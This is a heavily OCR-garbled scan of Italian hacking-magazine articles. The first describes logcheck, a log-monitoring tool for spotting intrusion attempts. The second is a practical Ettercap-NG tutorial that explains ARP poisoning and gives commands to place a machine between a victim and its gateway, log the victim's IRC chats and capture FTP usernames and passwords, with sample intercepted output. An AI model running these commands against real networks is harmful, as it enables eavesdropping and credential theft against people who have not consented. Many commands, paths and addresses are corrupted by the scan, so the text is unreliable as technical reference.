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VIOLAZIONI NEGLI 




Uno dei modi per verifi- 
care, ad eventualmente 
scoprire, se un com- 
puter sia stato oggetto 
di tentativi indesiderati 
d'accesso, è quello 
di ricercare le informazioni nei file 
di log, accertandosi che nessuno si 
sia intromesso nel nostro sistema, 
nell'assenza di manomissioni agli 
stessi file. 

Cercare eventi di questo tipo nei vari 
file è un operazione laboriosa, che 
può richiedere ore, se non qualche 
giorno, a seconda delle dimensioni 
dei log e della tipologia di eventi che 
ricerchiamo. Per tale scopo sarebbe 
utile poter disporre di un programma 
che, eseguito ciclicamente, estragga 
dalle informazioni contenute nei vari 
file di log del sistema solo quelle re- 



lative ad eventi anomali o collegati a 
tentativi d'accesso non autorizzati e li 
invi! ad un indirizzo di posta (general- 
mente all'amministratore del sistema), 
dopo averli ordinati e organizzati per 
tipologia, 



LDEDHECK: 
!_□ SCOVA INTRUSI 



Per le finalità appena descritte uti- 
lizzeremo uno script di shell che si 
chiama logcheck, sviluppato da Craig 
Rowland. Le moderne distribuzioni 
contengono questo strumento, ma 
per l'ultima versione si consiglia di 
visitare siti come RPM Fino) - http:// 
rpmfind.net. Oltre alle distribuzioni 
Gnu/Linux, è possibile installare 



PER SCOPRIRE 

SE UN COMPUTER 

SIA STATO 

OGGETTO 

DI TENTATIVI 

DI ACCESSO 

INDE51DERATD 

E5I5TEIND 

DIVERSI 

STRUMENTI . 

COME 

LDGCHECK. .. 



ed utilizzare questo software per 
altri sistemi operativi del ceppo Unix 
(FreeBSD, BSDI, Sun, HPUX, Digital- 
OSF/1 , Ira) scaricando quanto serve daL 

http : //logche ck . org/ 

Per l'installazione è necessario essere 
utente root e digitare: 

$ rpm -ivi! logrtiesk-1.3, 13-4.iseS.rpm 

Se vogliamo visualizzare la lista dei 
file che sono stati installati sulla no- 
stra macchina, occorre eseguire il 
comando "rpm -qil logGheck", I prin- 
cipali file Che saranno listati devono 
essere i seguenti: 

/usr/shc-e/ doc/logcheck-1 . 3 . 13 
/varVlogdheck 






V] □ LATI □ N S . 
IGNORE IN PRATICA 



Poniamo di avere due record di log: 

Sep 13 21:00:08 locclhost 
sewfcwil[231233: GM03745: 
to*rr.arvin, ctladdr^root 
(0/0), delay=00:00:03, 
xdelay=eO:00:02, rKrilerWltxGl, 
stat=refused 



Sop 17 17:17:17 localhast rs,hd: 
refused connect from guestuscr* 
localhost:14g0 



/usr/bin/logtail 
1 /etc/logcheck/hacking 
I /rtc/logcneck/vialPtions 
I /etc/logche ck/vi ol ati ons . i gnore 

/etc/logcrieck/'ignore 

/usr/binAogcheck . sri 

/rtcAron.nourLy/lagcheck 

Esaminiamo quelli più importanti. 

I 'shcpe/doc/logcheck-1.3.13 

contiene i (ile di documentazione rela- 
tivi al pacchetto (READ ME, INSTALL, 
CHANGES, ecc.]; 

/var/Logcheck 

è utilizzata come directory d'appog- 
gio de! file di log temporaneo, crealo 
durante l'esecuzione di logcheck; 
questo file è costituito dall'accoda- 
mento di tutti i log di sistema che 
vogliamo controllare ed è cancellato 
al termine dell'esecuzione dello script; 

t 

/usr/bin/logtail 

logtail è un programma, eseguito 
all'interno della script logcheck.sh, 
in grado di memorizzare ii puntatore 
relativo all'ultima riga del file di log 
esaminato, ed è possibile utilizzarlo 
anche per altri file di tipo testuale, nel 
caso vi serva una funzione di questo 
tipo. Durante le successive esecuzioni 
dello script, le righe dei file di log die 
sono già state lette in precedenza, 
saranno scartate, Per ogni file di log 
sarà creato, nella stessa directory, 
un corrispondente file "########.of- 



6 HACKER . 



fset", dove ####### è lo stesso nome 
del file di log esaminato; questo file 
conterrà un valore numerico riferito 
all'ultima riga letta; 

/etc/logcheck/hacking 

contiene stringhe di caratteri che, se 
trovate nei file di log, sono riportate 
nel messaggio di posta elettronica 
inviato e sono presentate alla fine 
in una sezione con il titolo "Attive 
System Attack Alerte"; 

/etc/logche ck/ violar i ons 

in questo file troviamo parole e strin- 
ghe che in genere sono contenute in 
eventi considerati "negativi"; record d< 
log contenenti parole come "denied" 
e "refused" attivano durante l'esecu- 
zione di logcheck righe di report nella 
sezione "Security Violations". 

E' possibile in ogni caso che tali 
eventi, anche se segnalati, possano 
essere accettati (ad esempio un 
utente che ha sbagliato la propria 
password durante la procedura d'ac- 
cesso al sistema); 

/eto'loncheck/violations . ignora 

supponiamo che una stessa stringa di 
caratteri sia contenuta in due diversi 
record di log, ma ohe solo uno di 
questi debba essere riportato come 
violazione al sistema. Possiamo utiliz- 
zare il file violaiions.ignore allo scopo, 
chiarendo questo concetto l'esempio 
riportato di seguito. 



Poiché vogliamo che solo la se- 
conda riga di log (quella delle ore 
17:17:17) debba attivare un allarme, 
altera inseriremo la stringa "refused" 
nel file violations e "maiier^iocal, 
stat=refused™ nel file violations, ignore 

/etc/logcheck/ignore 

contiene le stringhe da ignorare e 
da non indicare In nessuna sezione 
del report finale; tutte le righe di log 
contenenti parole che non saranno 
trovate in nessuno dei quattro file 
appena visti, utilizzati da logcheck 
per filtrare i log (hacking, violations, 
violations.ignore, ignore), saranno 
aggiunte al report finale all'interno 
della terza sezione identificata con 
"Unusual System Events"; 

/usr/bin/logcheck.sh 

questo script shell è il fulcro delle 
attività di controllo e contiene al suo 
intemo varie sezioni contenenti le 
definizioni di variabili relative ai di- 
versi sistemi operativi dove logcheck 
può essere eseguito. Se vogliamo 
quindi eseguire logcheck, stì su una 
macchina con un sistema operativo 
diverso da Linux, occorre rendere 
attive (non commentate) solo le righe 
relative a quel particolare sistema 
perché, rispetto a quest'ultimo, i co- 
mandi utilizzati all'interno dello script 
possono variare. Ad esempio, in lo- 
gcheck.sh è definita la variabile MAIL, 
Che può assumere i valori "mail", 
"mailx", "Mail", rispettivamente per i 
sistemi operativi Linux, HPUX, Digital- 
OSF/1. 



SCRIPT MANUALE 
□ AUTDMATinn 



Lo script logcheck.sh può essere 
eseguito manualmente, oppure in 
modalità automatica, inserendo 
nella crontab (tabella dei comandi/ 
programmi eseguiti a tempo dal 
programma cron) quanto segue: 



/usr/inn/logcheck , 



{per una dettagliata spiegazione 
dei possibili valori ohe possono 
essere assegnati ai campi di 
crontab usate il comando "man 5 
crontab"). 

La sequenza logica delle ope- 
razioni effettuate dallo script 
logcheck.sh si può riassumere coi 
seguenti punti: 

- è eseguito il programma logtail 
che accoda i file di iog in un unico 
file temporaneo, prelevando solo 
le informazioni non ancora trattate 
da precedenti esecuzioni di lo- 
gcheck; 

- per ogni riga del file di log tem- 
poraneo creato, è eseguita una 
scansione per la ricerca delle strin- 
ghe uguafi a quelle contenute nel 
file "hacking™, generando, se tro- 
vate, la sezione di report intitolata 
"Active System Attack Alerts"; 

- per ogni riga dei file di log è 
eseguita una scansione per la 
ricerca delle stringhe uguali a 
quelle contenute nel file "viola- 
tions", scartando, per quelle con 
confronto positiva, le righe che 
contengono stringhe di carat- 
teri uguali a quelle contenute in 
"violations.ignore" e generando 
la sezione di report intitolala 
"Security Violatlons", Circa ia rela- 
zione tra "violations" e 'violations, 
ignore", rivedete I "esempio fatto 
quando abbiamo parlato di questi 
due file. La terza ed ultima se- 
zione del report, "Unusual System 
Events", contiene tutte le restanti 
informazioni di log Che non hanno 
trovato corrispondenza di stringhe 
nel file ignore, precedentemente 
visto, Il report sarà spedito all'in- 
di-lzzo ci costa def nito nel a 
variabile SYSADMIN. 



Osservando l'immagine precedente, 
nella sezione "Active System Attack 
Alerts", osservando l'evento regi- 
strato nei file di iog alle ore 20:43:47 
è evidente come dall'Indirizzo Ip 
192.168.0.99 sia stato impartito un 
comando sendmail di "vrfy"; ciò 
potrebbe indicare l'attivazione di un 
processo telnet sulia porta 25 (smtp) 
per scopi illeciti. L'evento delle ore 
21:49:12, nella sezione "Security 
Violations", denuncia il fallito tenta- 
tivo da parte dell'utente marvin di 
impartire il comando su (superuser) 



■ per ottenere i privilegi 
dell'amministratore 
di Sistema; in questo 
caso l'utente mar- 
vin aveva sbagliato 
la password di rooi 
Nella sezione "Unusual 
System Evems", infine, 
si rilevano tre record di 
log relativi ad opera- 
zioni d'autenticazione; 
sono eventi di normale 
routine durante l'attività quotidiana 
dell'utente, ma non essendo stati 
inseriti nel file "Ignore" utilizzato dalla 
script logcheck, sono comunque 
inseriti nel report. Concludendo, 
logcheck sicuramente può essere 
uno degli strumenti da utilizzare per 
implementare una politica di con- 
trollo relativa alla sicurezza di un 
sistema, ma i suoi report devono 
essere continuamente esaminati e 
se sospettiamo attività illecita, la 
frequenza d'esecuzione dello script 
deve essere aumentata. 
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ETTERCAP - NE È UNA V RIBCRITTURA ni f^ll IF.LLO CHE 
FTTERCAP- UN TDDL COMPLE TAMENTE ITALIANO FORTE 
"TEMUTO " DAGLI AMMINISTRATORI DI SISTEMA. 



ERA 
MENTE 



spesso accade, può essere 
utilizzato in modo molto 
diverso a seconda di chi io 
impiega. Dei resto, il bene e il mate 
sono spesso due facce contrapposte 
defla stessa medaglia, all'utente spetta 
d scotta finale. In parole povere 
Ettercap-NG consente di sniffare il 
traffico su una rete switctiata, 
anatazario, grabbare le password, fare 
d:s5eetiort di vari protocolli, bloccare 
connessioni, seguire lo stream dati di 
una particolare macchina e molto altro 
ancora... 



QGVE REPERIRLO _ 

L'installazione non presenta particolari 
: ; - orni, sono richieste alcune 
dipendenze che in genere saranno già 
presenti di default suite vostra box. 
Scarichiamo quindi Ettercap, al 
momento in cui scrivo l'ultima versione 
è la la potete trovare su 
rrttptfettercap.sourcefarge.net. 
Prima di procedere ali'unpack 




I Is ~1 /usrAib/libpcap.so 
lrmtfwrwx 1 root root 23-. 
Jun 12 2009 /usr/lib/libpCQS.SO 
-> /usr/lib/Libpcap.scP.S 

$ Is -l- 
/usr/lib/libpcap.so.O.B 

-rwxr-xr-K 1 root root-. 
1641ZS Apr 1 2009^ 
/us r/li b/li bpccp . so .0 .5 

Traverete un link e quindi la librerìa, sa 

non avete nessuno di questi file allora 

dovrete scatfcarìi da: 

http://www.topdump.org/release/libpGa 

p-0.8.3.tar.gz, l'installazione è molto 

semplice: 

$ tor xzf-- 

/usr/po rtage/di stf i 1 e s/libpcop 

0.8.3,tar.gz 

$ ed Ubpcap-B.S.3 

# ./configure S& moke &^ 

instali 

La seconda dipendenza è 
rappresentata dalle libnet, utilizzate per 
fare packet injectìon, verifichiamo di 
averle: 

1 Is -l /usr/UbA 
libnet.a 

-rai-r-r- 1 root ™t 13SSZ8-. 



/usr/Ub/Ubnet.a 



Se non le avete scaricatele da qui: 
http://www.5fr- 

fresh.com/unix/privaS/libnet-1 .1 .2.1 ,tar. 
gz/ , l'installazione è semplice come 
per le libpeap: 

S tar xzf-> 
/usr/ portage/di stf iles/li bnet - 
1. 1,2.1. tar. gz 

$ ed libnet 

# ./configure SS make S&-. 
make instali 

Éd, infine, le libftdl per l'utilizzo dei 
plugin, queste lib [che molto 
probabilmente non avrete} sono parte 
delle lìbtool, perciò installeremo lìbtool, 
scaricatele da qui: 

htJp://ftp.gnuWgnu/libtool/ e quindi: 

ì tar xzf libtool- 
Z.Z.tar.gz 

i ed lìbtool -l, l 
$ ./configuro && moke SS 
ke instali 



usare ettercap da console o eia 
X, nel primo caso vi basterà avere te 
ncurses, nel secondo dovrete installare 
le GTK+, ma per questo vi rimando al 
README dei pacchetto perché 
!' installazione richiederebbe un articolo 
a parte . 

Infine, se desiderate testare la 
dissectìon dei protocolli SSH, avrete 
bisogno di o perissi 

t Is -1 /W/Ub/Ubssl.c 
-nv-r--r-- 1 root root-. 

308012 Dee 11 01:27- 

Aisr/lib/libssl.a 

Che potete trovare qui: 
http://www.openssi.org/ fate: 

S tar xzf openssl— . 
0.9,8g.tar.gz 

$ ed openssl-0.9.8g 

# ,/config Ui make SS-. 
make test && make instali 

E quindi passiamo all' installazione di 
Ettercap: 

% tar xzf ettercop-NG-- 
0,7,3,tar.gz 

S ed ettercap-NG-ft.7.3 

# , /configure && moke &&- 
make instali 

Per avviarlo, ovviamente, abbiamo 
bisogno dei permessi di root, possiamo 
scegliere tre modalità differenti di 
interfaccia grafica: 

# ettercap -1 // Per 
avviarlo in modalità' testo 

# ettercap ~C // Per 
avviarla con le ncurses 

# ettercap -G // Se siamo 
sotto X e vogliamo una GUI 

Se Siete in un terminale avviate il 
programma con "-C", se invece avete a 
disposizione un server grafico, usate "- 
G". Nel caso dì interfaccia con ncurses 
ricordate che potrete navigare tra le 
finestre con il tasto 'Tab", e potrete 
chiuderie Con "CtrftQ", se invece avete 
avviato Ettercap da un Xterm potrete 
usare direttamente il mouse. 
Sotto il menu "Snìff" troverete due 
possibilità': "Unified Sniffing" e 
"Bridged Sniffing", analizziamoli 
entrambi per capirne il loro Significato. 



Scegliendo questa opzione Ettercap 
prenderà tutti i pacchetti in transito 
sul cavo, ne verificherà la 
destinazione e se non sono diretti alla 
macchina dalla quale stiamo 
operando, li redi razionerà 
direttamente sulla rete. Scegliendo 
questo tipo di sniffing l'IP forwarding 
verrà logicamente disabilitato, questo 
per evitare che un pacchetto venga 
rimandato all'host di destinazione due 
volte, una da Ettercap e una dal 
kernel. Gli autori ci avvisano anche di 
utilizzare con attenzione questa 
modalità se ci troviamo su un 
gateway, questo perché Ettercap 
ascolta il traffico su una Singola 
interfaccia di rete e su una macchina 
dotata di più interfacce, non sarebbe 
possibile ri-routare il traffico nelie 
giuste direzioni. 

Quindi, se vi trovate su un gateway, 
prima di iniziare lo sniffing, andate sul 
menu "Options" e selezionate 
l'opzione "Unoffensive" (che dice ad 
ettercap di NON disabilitare il packet 
forwarding del kernel]. Una volta 
avviato io sniffing dal menu "Start" 
potremo operare tutti I tipi di attacchi 
man-ìn-the-middie (MITM d'ora in poi) 
che il programma mette a nostra 
disposizione. 

Come suggerisce il nome stesso, in 
questa modalità sarà possibile 
effettuare lo sniffing del traffico 
utilizzando la nostra scheda di rete in 
modalità bridge, avremo quindi 
bisogno di due interfacce dal 
momento che quella che viene posta 
in bridged mode diventerà 
completamente trasparente al traffico, 
e quindi non sarà possibile utilizzarla 
per manipolare i pacchetti. 
Questa opzione, sebbene presenti lo 
"svantaggio" di dover disporre di due 
schede di rete, rende le nostre 
operazioni assolutamente invisibili agli 
altri... Ma prima di entrare nel 
dettaglio, abbiamo bisogno di 
conoscere le basi di una rete 
computer. 




I, LAYER E HUB 



Una rete, supponiamo per il 
momento che sia solo la nostra LAN 
o quel la che abbiamo in ufficio, è un 
insieme di Layer (cioè livelli), ognuno 
Sei quali svolge un compito diverso, 
A seconda dei casi una rete può 
essere considerata come un 
sandwich di 5 o 7 layer differenti, ma 
nel nostro caso avremo bisogno 
soltanto di conoscete i primi 4, che in 
ordine sono: 

Layer 4 Trasporto 
Layer 3 Network 
Layer 2 Datalink 
Layer 1 Fisico 

I! primo layer viene utilizzato per il 
trasporto dei segnali elettrici che 
rappresentano i dati che viaggiano 
sulla rete, questi segnali (che in 
genere sono onde quadre) viaggiano 
da una parte all'altra tramite cavi, 
raggi laser, onde elettromagnetiche o 
raggi infrarossi, quindi la trasmissione 
def segnale la parte del Layer Fisico. 
Questo layer si occupa del controllo 
dei segnali, verifica che non ci siano 
stati problemi e si accorge se un 
segnale è arrivato disturbato a causa 
di collisioni o problemi sul mezzo di 
trasporto. 

Il secondo layer diventa un pochino 
più astratto, su questo livello 
viaggiano t pacchetti datalink, nel 
caso di una Lan Ethernet (ne esistono 
svariati altri tipi) questi pacchetti 
hanno una lunghezza fissa e 

jona, oltre ia parte riservata ai 
un indirizzo sorgente ed une 



L 



nghi 48 bft, ad esempio: 
55:S4:F2^8:S1 . Ogni scheda di 
e ha un MAC Address unico in 
o il mondo, ed esistono alcune 
ative per evitare che due 
producano schede con lo 
numero. E' molto importante 
C sìa univoco per evitare 
Sulla rete Lan vengano a crearsi 
problemi. Questo livello si preoccupa 
di effettuare un controllo sui dati dei 
pacchetti, per vedere se sono arrivati 
come ci si aspettava, in caso 
contrario ne chiede II rinvio. 
Il terzo layer è quello su cui dimora IR 
il protocollo IP serve esclusivamente 
per la consegna del pacchetto, IP 
non conosce porte né servizi, il suo 
unico scopo è quello dì consegnare il 
pacchetto, se I dati sono rovinati o 
non arm/ano, a lui non Importa, 
diciamo che IP è una sorta di 
postino, lui fa di tutto per consegnare 
il pacco, ma se durante il tragitto 
viene derubato, allora non dice nulla 
(IP non può semplicemente sapere 
che un pacchetto è andato perso). 
Un pacchetto i P è formato da un 
header con varie opzioni, un indirizzo 
sorgente e uno destinazione lunghi 
32bit, che sicuramente avrete visto, 
ad esempio: 1 92.168.1.1 è un 
i ndirizzo IR anche se abbiamo 
rappresentato l'indirizzo MAC 
separato dai ":" e !' indirizza IP 
separalo dal ci terrei a ricordane 
enee una convenzione per noi 
umani, alle macchine questo non 
interessa perché nel pacchetto, a 
seconda dei livelle- in cui si trovano, 
non faranno altro che leggere un 
numero più o meno lungo. 
Il quarto layer, detto anche layer di 
trasporto, è rappresentato dal 
protocollo che si occupa di portare a 
destinazione, integri, tutti i bit de) 
payload. I più noti, e che sicuramente 
conoscerete sono: TCP e UDR 
Quando sentite qualcuno che vi 
chiede di colìegarvi ad una macchina 
sulla porta XX, allora si sta 
sicuramente riferendo al layer 4, è 
infatti questo il livello che "conosce" 
ed utilizzale "porte". TCP e UDP in 
particolare si preoccupano di 
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connessione, e alla ricezione di og 
pacchetto invia una conferma, gr 
a queste procedure il TCP garanti 
la consegna dei dati (sempre che ia 
linea non sia interrotta, 0 la i 
spenta, ma in questo caso TCP ce fe- 
direbbe immediatamente). UDP, 
invece, consegna i dati su una 
determinata porta senza 
preoccuparsi se arrivino o meno a 
destinazione, se un pacchetto UDP si 
perde, non lo sapremo mai, ma se 
arriva saremo Sicuri che i dati in esso 
contenuti sono esattamente quelli 
inviati e non contengono alterazioni. 
L'assenza di una connessione con 
conferma di arrivo rende UDP più 
veloce, e quindi appetibile su 
protocolli dove la latenza è 
importante (protocolli realtime o di 
online gaming), mentre TCP è 
preferibile dove è necessario sapere 
se i dati sono arrivati o meno 
(Immaginate di inviare una mail e 
sentirvi dire che è arrivata a pezzetti, 
non ne sanaste di certo felici), Tenente 
a mente che l'assenza di una 
connessione con conferma rende 
l'UDP molto più vulnerabile ad 
attacchi di tipo MITO rispetto al TCP. 

RETE A "CIPOLLA" 



Se non conoscevate questa 
distinzione sono sicuro che ora la 
vostra concezione di rete è 
leggermente cambiata, perche 
messa sotto quest'ottica i pacchetti 
diventano delle cipolle più che del 
oontenltorini di dati. VI srete chiesti il 
perché? immaginate una rete formata 
eia un pc collegato ad un rauter 
collegato su internet, noi Stiamo 
navigando sul sito web della nostra 
rivista e vogliamo scaricare un file, al 
momento del click sul nome del file 
all'interno det nostro- browser, viene 
costruito un pacchetto di richiesta, le 
fasi sono queste: a livello 4 il 
pacchetto verrà marcato con la porta 
di destinazione 80 (web), verrà 
riempito con la nostra richiesta di 
download e quindi il controllo 
passato al layer 3, questo la 
metterà un'. 
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ScnverKiuui sopiti H iiusuu ir nume 
sorgente, e quello del Sito delia rivista 
come destinazione. Ora si scende a 
layer 2, dove il pacchetto viene 
imbustato in un pacchetto dataìinksul 
quale verrà scrìtto come indirizzo 
sorgente il nostro MAC e come 
destinatone non verrà scritto l'indirizzo 
MAC del sito delia rivista perché noi 
non possiamo conoscerlo (sappiamo 
infatti solo il suo IP), ma verrà scritto 
l'indirizzo MAC della macchina che 
invi era suda reta internet il nostro 
pacchetto, in questo caso quello del 
router. Ed ora il layer 1 invierà un 
segnale Che verrà inoltrato sui cavo. 
La scheda di rete del router vedrà il 
segnale (layer 1), lo leggerà, e 
verificherà che Si tratta di un pacchetto 
dataftik (layer 2) destinato a lui (in caso 
contrario verrebbe ignorato), quindi 
prende rota del mittente, scarta 
l'intestazione MAC e ne legge l'IP, 
preleva questo pacchetto (a layer 3) e 

10 invia su internet. Dopo pochi 
millisecondi il server della rivista lo 
vedrà in arrivo sulla porta 80 (di nuovo 
layer 4), scarterà l'instestazione del 
TCP, leggerà il contenuta del pacchetto 
e ci invierà il file. Tutto questo in 
pochissimi millisecondi. 
Considerate ora una lari con più di due 
PC, per collegaili tra loro saprete che è 
necessario un Hub o uno Switch. 
Guardandolo, a meno che non ci sia 
scritto sopra, non potrete capire se si 
tratta di un Hub o di uno Switch, anche 

H se potrebbe sembrare un dettaglio da 
nulla la differenza tra questi due 
dispositivi è enorme. 
Un hub innanzitutto funziona soltanto a 
Layer 1 , è praticamente un ripetitore di 
segnali, non si preoccupa di leggere il 
pacchetto in sé, luì ascolta per un 
segnale e poi lo ripete su tutte le porte. 
Se su un hub il segnale arriva sulla 
porta 2, verrà amplificato e ritrasmesso 
su tutte le altre porte ad eccezione di 
quella sorgente. Sapete questo cosa 
vuol dire? Che con pochi accorgimenti, 
possiamo leggere il traffico di tutti gii 
altri, anche quello non destinato a noi, 
Uno switch invece funziona a layer 2 (i 
più costosi anche a layer 3), ciò vuol 
dire che il dispositive deve poter 
leggere il pacchetto per poterne trovare 

11 MAC sorgente e il MAC destinazione, 



su vi &icut? w ji^wfiuv a wi vi? 

leggere il pacchetto, presto detto: 
sapendo a chi è destinato non siamo 
costretti a ritrasmettere il segnale su 
tutte le porte, malo ìnvieremo soltanto 
sulla porta dove è attaccato il nostro 
destinatario. Su uno switch non è 
quindi possibile (con le conoscenze 
acquisite fino a questo punto) ascoltare 
il traffico che arriva sui pc degli altri 
Utenti, semplicemente perché... questo 
traffico non giunge mai sul nostro cavo. 
Uno switch, inoltre, consente di 
ottenere una lan più efficiente perché 
non si hanno più collisioni sui 
pacchetti, come, invece, avviene 
spessissimo con gli hub. 
E un bridge? Un bridge è un dispositivo 
molto simile ad uno switch, lavora a 
layer 2 ma serve (in genere) a collegare 
tra loro due lan che usano protocolli 
diversi, è completamente trasparente al 
traffico perché non è raggiungibile 
tramite un indirizzo IP o MAC, ed il suo 
lavoro è "semplicemente" quello di 
tradurrei pacchetti da un protocollo 
all'altro, se necessario, e metterti sulla 
giusta rotta. 

E' molto importante conoscere il 
funzionamento di una rete se vogliamo 
capire come fa a funzionare uno sniffar, 
e cos'è un attacco MfTM, ora che tutto 
è stato spiegato, possiamo tornare a 
divertirei con Ettercap. 



SNIFFING E MITM 



Per sniffare il traffico è necessario un 
solo accorgimento, a layer 2 la nostra 
sheda di reta semplicemente ignora i 
pacchetti che non hanno come MAC dì 
destinazione il nostro MAC. Come 
ovviare? Basterà mettere fa scheda in 
modalità promiscua, tale modalità farà 
si che la nostra scheda invìi al kernel 
tutti i pacchetti che attraversano il 
cavo, siano essi destinati a noi o meno. 
Non è assolutamente difficile, dotatevi 
dei privilegi di root e fate: 

# ifconfig ethB (ambiate 
ethfi con la vostra interfaccia) 

ethS Link- 
encap : Ethernet Mtaddr-. 
00:04:24:CA:B6:21 

inet addr;X92. 167.1. 
Beast:19Z.167. 1.255 




Sulla prima riga potete vedere il vostro 
indirizzo Layer 2 |0Q:O4:24:CA:B6:21 ), 
sulla seconda l'indirizzo Layer 3 
(1 32. 1 67.1 .1 2} e sulla terza le opzioni, 
come vedete non Ce' scritto che ia 
scheda è in modalità promìscua, 
poniamo rimedio a tutto ciò: 

# ifconfig ethB promise 
eth0 Link-i 

erteop: Ethernet Hfl/oddr-. 
00:04:Z4:CA:B6:Z1 

inet addr:l92, 167.1. 12- 
Btmt;tó2.1i7.1.255H 
Mask:255.255. 255.0 

UP BROADCAST RUNNING-. 
PROMISC MLLTICAST WTU:1500- 
Metrtc:l 

Ok ora siamo in modalità promiscua a 
tutti i pacchetti saranno letti dalla 
scheda di rete, non è comunque 
necessario fare a mano questa 
operazione, Ettercap logicamente la 
farà per noi, perciò rimettiamo tutto 
come era prima; 

f ifconfig etW} -promise 

Proviamo quindi ad avviare u na 
sessione di snìffing, apriamo una 
console e digitiamo: 

# ettercap -Tp (avvia in 
modalità' testo e promiscua) 

Tutti i pacchetti saranno stampati a 
schermo, bloccate tutti i vostri 
download e cercate di guardare gli 
Indirizzi, se vede pacchetti dove voi 
NON siete presenti né nella destione né 
nel sorgente, allora vi trovata su un 
Hub, se, invece, non vedete del traffico 
"estraneo" allora siete su uno switch, 
cosa si fa allora? 
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CDMPUTER/DIFFI 



Ettepeap-Hlfi: 



Mettetevi nei panni del router appena 
acceso, le sue tabelle saranno vuote, 
in quel medesimo istante arriva un 
pacchetto dalla rete internet destinato 
ad un IP pubblico presente nella sua 
lan... Cosa fa? Crea un pacchetto 
particolare, destinato a tutti (tale 
pacchetto si chiama broadcast e da 
"tutti" è identificato con questo 
indirizzo MAC: FF:FF:FF:FF:FFiFF| 
con scritto dentro "who-has ip" cioè 
"chi ha questo Ip?". tutte te macchine 
leggerano il pacchetto ma risponderà 
soltanto quella che possiede l'iP 
cercato dicendo: "reply l'ip è a 
01:Q2:03:Q4:Q5:G6". Il nouter saprà 
quindi a quale MAC appartiene 
quell'IP e sarà in grado di creare un 
pacchetto Layer 2 per inviare la 
richiesta proveniente da internet sulla 
rete Lan, verso l'IP cercato. 
La gabola è ora sicuramente più 
Chiara, se su uno switch non 
possiamo leggere il traffico destinato 
agli altri, perché non ce lo facciamo 
mandare Che è più comodo? 
Supponiamo quindi di voler ricevere 
tutto il traffico che la macchina A 
manda SU internet tramite il gateway 
G, noi siamo B, come facciamo? 



INDIRIZZI IP E MAC 

Chiariamo la situazione disegnandoci 
urei tabella dei corrispondendi IP e 
MAC: 

Macchina MAC IP 
A 07:02:03:04:05:06 1 92.167.1.10 
3 11:1 2:1 3:14:1 5:16 192.167.1.31 
G 21:22:23:24:2536 192.167.1.1 

Possiamo risolvere brillantemente il 
problema in due soli step: 

Inviane un pacchetto ad A 
aicendo: "reply 192.167.1.1 is 
at 11:12:13:14:15:16" 
Inviamo un pacchetto a 6 
dicendo: "reply 192.167-1.10 is 
ot 11:12:13:14:15:16" 

I pacchetti vengono accettati? Certo! 



arp-cache (la tabella dove vengono 
mantenute le corrispondenze mac-ip) 
e se anche fosse necessario, 
basterebbe poco per fargliene 
mandare uno. Dopo di che, G saprà 
che TIP di A corrisponde al nostro 
MAC, e A saprà che l'IP di G 
corrisponde al nostro MAC. Perciò A 
invierà a noi credendo di inviare a G, e 
G invierà a noi credendo di inviare ad 
A. Manca qualcosa? Sì, tutto il traffico 
che arriva a noi da uno dei due host 
andrà reindirizzato verso l'altro, 
altrimenti non potrà instaurarsi 
nessuna connessione, questo si 
chiama: attacco MfTWI. Ovvero, 
qualcuno è nel mezzo della 
connessione... E, ovviamente, può 
f are quei che vuole, se invece 
facciamo anp-poisoning su tutte le 
macchine della rete senza modificare 
il traffico, allora si tratta solo dì 
sniffi ng. 

ATTACCO MITM 

Proviamo quindi ad effettuare un 
attacco WirrM per sniffare una 
sessione IRC di una macchina della 
lan, per far ciò dobbiamo aver chi aro 
in mente cosa succede: la macchina 
vittima si collegherà ad un server ire 
su internet, ma, come abbiamo già 
spiegato, i pacchetti arriveranno al 
gateway e da fi verranno inviati su 
internet, quindi dovremo fare un 
attacco MITM tra la macchina vittima 
e il gateway, sulle porte classiche del 
servizio IRC, cioè in genere quelle che 
vanno da; 6666 a 5569, facciamo così 
(è indifferente l'interfaccia grafica 
usata, quindi non prendetela in 
considerazione perché i comandi 
sono gli Stessi], supponiamo che la 
macelli na vittima sia 1 92.1 67.1 .3: 

# ettercap -T-L irc.log -M-> 
arp /1 92.1 67.1 .3///6656-6È69 

In questa maniera diciamo a Ettercap 
di avviarsi in modalità testuale (-T), 
loggare tutto il traffico sul file irc.log (- 
L irc.log), effettuare un attacco MITM 
tramite arp-poisnning, perché nel mio 



lab la rete è cablata su switch. 
attrimenti non potrei sniffare nulla (-M 
arp} e di leggere tutto il traffico 
proveniente dalla vittima 
(/1 92.1 67.1 ,3/) diretto a qualunque 
host f/fy sulle porte che vanno da 
6666-6669. Urta volta avviato Ettercap 
colleghiamoci ad un qualunque server 
ire, mandiamo qualche messaggio di 
test, in seguito premiamo "q" sul 
prompt dove sta girando Ettercap ed 
esaminiamo il log, per farlo dovremo 
solo usare etterlog: 

# etterlog irc.iog.ecp 

Tue Jan 26 18:48:5© 2009- 
[765193] 

TCP *.*.*.*:6666 —:>- 

192.167.1.3:1953 I AP 

: test! -testai t PRIVWSG test- 



Tue Jon 26 18:48:51 2009- 
[766219] 

TCP * :6666 

192.167.1.3:1958 I AP 
:testl~test»*.it PRIVWSG 
:corne va tutto bene?. 



Tue Jan 26 18:48:54 20f 
[769+12] 

TCP *.*.*.*;6666 --> 
192.167.1.3:1958 I AP 
rtest! -teste*. it PRIVM! 
;test sniffino.. 



Sulla prima riga traviano la data, sulla 
seconda il tipo di connessione, l'ip 
sorgente, la porta di provenienza e Tip 
di destinazione, "AP" sono i flag top. 
Grazie al logging siamo in grado di 
segui re per intero una conversazione 
che avviene su ire, e non solo, in 
maniera simile possiamo anche 
monitorare le password che, ad 
esempio, vengono utilizzate su un 
server ftp: 



É ettercap -Tq 
57.1.3/ //Zi 



Cosi facendo diciamo ad Ettercap di 
avviarsi in modalità testo (-T) ma 
aggiungiamo il parametro "q" che 
serve a dire di non stampare tutto il 
traffico, verranno quindi stampate 



L 
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richiediamo il solito attacco MITM 
sull'host vittima verso qualunque ftp, 
ecco cosa succede alla prima sessione 



FTP ; 212,84.*. *:21 ■*-> 
USER-, mirko PASS: ny„poss 

Viene mostrata a schermo solo la 
password del servare questo grazie 
all'FTP dissector, ovviamente Ettercap 
supporta una serie di altri protocolli che 
sono: telnet, pop. rtogin, sshl , icq, smb, 
mysql, http, nrrtp, X1 1 , napster, ire, tip, 
bgp, sooks 5, imap 4, vnc, Idap, rrfs, 
snmp, half life, quake 3, msn, ymsg. •' 
A questo punto dovreste aver notato 
una cosa interessante. , . E' possibile 
visualizzare in chiaro anche il traffico 
sshl , ma come si fa? Sshl utilizza un 
meccanismo di scambio a chiave 
pubblica (o asimmetrica), che funziona 
in questa maniera: 

